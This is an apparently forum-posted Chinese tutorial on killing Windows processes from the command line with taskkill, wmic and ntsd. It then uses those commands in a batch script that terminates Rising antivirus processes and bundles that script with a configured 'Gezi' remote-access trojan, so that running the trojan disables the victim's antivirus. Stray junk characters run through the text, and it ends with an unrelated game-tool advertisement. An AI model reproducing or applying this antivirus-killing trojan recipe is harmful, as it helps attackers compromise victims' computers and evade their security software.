软件简介: B! S; Y' }1 _, g' K/ S
大家好,我是桦香,今天我给大家做个教程:cmd下命令提示符下关进程+木马捆绑关杀毒软件批处理* M1 K* O5 D6 Q0 b+ ?& U
本来打算做个语音的,由于麦克风出了问题,所以只好多打点字了,为了节约时间,大部分的字我已经打好了./ R0 C( |9 ~; u+ e* q7 b
cmd下命令提示符下杀进程主要有三种方法:- V0 f1 T! W9 {( P {& O
1、用taskill命令
7 H1 @1 e) X5 y `, L9 x" z ①taskkill /im 进程名称
$ D3 h* i [6 L; \" Q& Z 示例:用taskkill /im VStart.exe命令关闭音速启动,VStart.exe就是音速启动的进程名称,下面看操作,执行了三次,成功关闭了音速启动,再看下面的方法.2 d/ |% o* Z' U$ r6 s& _5 f9 l
+ R p! T; d' m% q6 e# L 9 g% W. \' x; {$ ]0 W
②taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程) 5 x; Z& l; E) }, \6 @- T$ q1 n
注:有两种方法查进程的PID码:# B$ p. m5 Y2 c' |8 B, |
①在命令行下用 tasklist 命令查出进程的PID号码,就是这些3 V! a5 C n9 v5 n
②在任务管理器中的查看选项中选择选择列中勾先PID那一项 f% F% v; {- H9 \/ M2 t
% x7 c7 r0 |. {; R9 { S 示例:举个关闭迅雷的例子,先找出迅雷的PID码2552
2 R4 o4 m* Q& v' I taskkill /pid 2552 -f,就是这个指令,下面来运行一下看看.看到没有迅雷已经关闭了,再看下面的方法
- }5 r, t) j) b- Q4 ]# l- [2、用 wmic process where name=进程名称 call terminate 这个不需要知道进程的PID号
% @, k# H2 m% S 示例:1 l. \3 q& ~/ w
wmic process where name=iexplore.exe call terminate 关闭IE浏览器,我们来运行一下这条指令看看.看到了吧浏览器已经关闭了,再看下面的.* j: N) I6 w8 K! _( C r! S, `* l
+ s2 _1 M! w3 \) D5 p3、ntsd -c q -p [pid进程码]
( P' R6 B3 s2 O6 M 示例:还是举个关闭迅雷的吧,同样先找出迅雷的PID码2724
/ I q Z% s& c, ^& Y, o ntsd -c q -p 2724 是这条指令,下面我们来执行一下看看.看到了吧,迅雷已经关闭了.; i" Y3 v: `' A$ a4 r
这样关进程有什么作用呢?
" s7 _5 N0 V6 ?, d0 j一方面遇到不能用任务管理器结束的进程可以试试上面的方法,而且用wmic process where name=进程名称 call terminate和taskkill /im 进程名称这两条可以同时关闭多个进程名相同的进程,举个关2个QQ的例子吧,
: W5 s: @/ K5 W9 n7 m8 {/ s已经打开了两个QQ程序,wmic process where name=QQ.exe call terminate,我们来执行一下看看,看到了吧,两个QQ都关闭了.
/ [6 B) Y- h& q4 o. O另一方面我们利用上面的命令可以做个关杀毒软件的批处理,然后把批处理文件和木马捆绑在一起,这样运行木马的时候就关闭了杀毒软件,下面看我操作8 m# u. P+ d4 g$ i, ~" p$ F) F% T
1、先建立一个关闭杀毒软件进程的批处理文件,这里我以关闭瑞星为例,说明一下我的瑞星已经关闭了监控系统,所以这些就不用了:wmic process where name=RavTask.exe call terminate
. u- e( x) {- ]1 p2 y3 ewmic process where name=CCenter.exe call terminate
8 ]: e2 c$ Q) g& f/ \wmic process where name=RavmonD.exe call terminate
, v+ R$ _! v s# A1 f6 nwmic process where name=Ravmon.exe call terminate# ]; z2 J$ S0 ?3 v
wmic process where name=RavStub.exe call terminate
. R. ^) `/ u' U: e( n$ _( y' d0 e0 ]: z2、配置一个木马,配个鸽子吧
- h4 @: K/ v' K; r+ j3、用文件捆绑器将批处理文件和木马捆绑到一起,这里我随便找个文件捆绑器,不是免杀的,
/ _" H% J' I! ?4 V' H已经捆绑好了
2 {7 c3 E9 D/ ]3 d `+ m我们来运行一下捆绑后的文件
, C2 g+ n1 o, v! j5 V& Q e: |看到没有,瑞星已经关闭了,鸽子也上线了.我没有免杀的文件捆绑器,大家有的话,希望可以送个给我.( P, `+ L) _% S7 C, b
下载地址:
|
天龙八部合区工具非常好用无任何限制
